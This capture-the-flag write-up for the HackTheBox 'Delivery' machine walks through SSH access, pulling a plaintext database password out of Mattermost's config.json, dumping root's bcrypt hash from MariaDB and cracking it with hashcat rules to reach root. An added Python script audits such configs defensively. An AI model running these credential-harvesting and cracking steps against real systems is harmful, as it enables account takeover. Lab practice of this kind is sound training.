INTRO
HackTheBox Delivery is a box rated Easy. Its machine matrix leans toward Custom Exploitation. The vulnerable application on the machine is Mattermost. Exploitation: MySQL: Useful Resources, MySQL: Sorting Result, MySQL: Select Query, and cracking the password using Hashcat: Rules Type Base64.
CTF
Hacking Tools:
NMAP SCAN
Open ports:
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
Add the machine's domain/IP to /etc/hosts:
sudo nano /etc/hosts
10.10.10.222 delivery.htb helpdesk.delivery.htb
ENUMERATION
ssh maildeliverer@10.10.10.222
Password: Youve_G0t_Mail!
Output:
maildeliverer@Delivery:~$
PRIVILEGE ESCALATION
Create the Rule Wordlist
echo -n "PleaseSubscribe!" > rule
Find the Mattermost Folder
cd /tmp && find / -name "mattermost*" > save.txt
cat save.txt
Output:
/opt/mattermost/config
cd /opt/mattermost/config
cat config.json
Output:
"DataSource":"mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s
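As an added defensive example (not part of the original writeup), the following Python parses the Go MySQL DSN format that Mattermost stores in SqlSettings.DataSource and flags the two weaknesses this box relied on: a plaintext database password in the DSN and a config file readable by other local users. The sample config is constructed from the excerpt above; the function names and the file-mode argument are my own assumptions.

```python
import json
import re
import stat

# Go MySQL DSN as stored in Mattermost's SqlSettings.DataSource:
#   user:password@tcp(host:port)/dbname?param=value&...
DSN_RE = re.compile(
    r"^(?P<user>[^:@]*)(?::(?P<password>[^@]*))?@"
    r"(?P<proto>[a-z]+)\((?P<addr>[^)]*)\)/(?P<db>[^?]*)"
    r"(?:\?(?P<params>.*))?$"
)

# Constructed sample (not the real file): the shape of the config.json
# excerpt above, including the \u0026 JSON escape that decodes to '&'.
SAMPLE_CONFIG_JSON = (
    '{"SqlSettings": {"DriverName": "mysql", "DataSource": '
    '"mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost'
    '?charset=utf8mb4,utf8\\u0026readTimeout=30s"}}'
)


def parse_dsn(dsn):
    """Split a Go-style MySQL DSN into user, password, proto, addr, db, params."""
    m = DSN_RE.match(dsn)
    if not m:
        raise ValueError("not a Go MySQL DSN: %r" % dsn)
    return m.groupdict()


def audit_config(config_text, file_mode):
    """Audit a Mattermost config.json body.
    file_mode is the st_mode of the file (e.g. os.stat(path).st_mode).
    Returns (parsed DSN, list of finding strings)."""
    cfg = json.loads(config_text)
    parts = parse_dsn(cfg["SqlSettings"]["DataSource"])
    findings = []
    if parts["password"]:
        # The DB password sits in the clear; anyone who can read the
        # file can log in to MariaDB as this user, as happened here.
        findings.append("plaintext password for DB user %r" % parts["user"])
    if file_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("config.json readable by group/others (mode %o)"
                        % (file_mode & 0o777))
    return parts, findings


if __name__ == "__main__":
    # A 0644 file, like a default-umask copy, trips both checks.
    for f in audit_config(SAMPLE_CONFIG_JSON, 0o100644)[1]:
        print("FINDING:", f)
```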
Root Password Hash
mysql -h localhost -u mmuser -pCrack_The_MM_Admin_PW
Output:
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Database changed
MariaDB [mattermost]> show tables;
Output:
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Users |
+------------------------+
46 rows in set (0.001 sec)
MariaDB [mattermost]> desc Users;
Output:
+--------------------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------+--------------+------+-----+---------+-------+
| Username | varchar(64) | YES | UNI | NULL | |
| Password | varchar(128) | YES | | NULL | |
+--------------------+--------------+------+-----+---------+-------+
25 rows in set (0.001 sec)
MariaDB [mattermost]> select Username,Password from Users;
Output:
+----------+--------------------------------------------------------------+
| Username | Password                                                     |
+----------+--------------------------------------------------------------+
| root     | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+----------+--------------------------------------------------------------+
19 rows in set (0.000 sec)
Create a file on the local machine (single quotes, so the shell does not expand the $ characters in the hash):
echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > hashroot.txt
HashCat Rule
ls -la /usr/share/hashcat/rules
Output:
-rw-r--r-- 1 root root 933 Jul 31 20:09 best64.rule
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout rule > wordlists.txt
wc -l wordlists.txt
Output:
77 wordlists.txt
hashcat -m 3200 -a 0 hashroot.txt wordlists.txt
Output:
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Root
su root
Password: PleaseSubscribe!21
Output:
maildeliverer@Delivery:~$ su root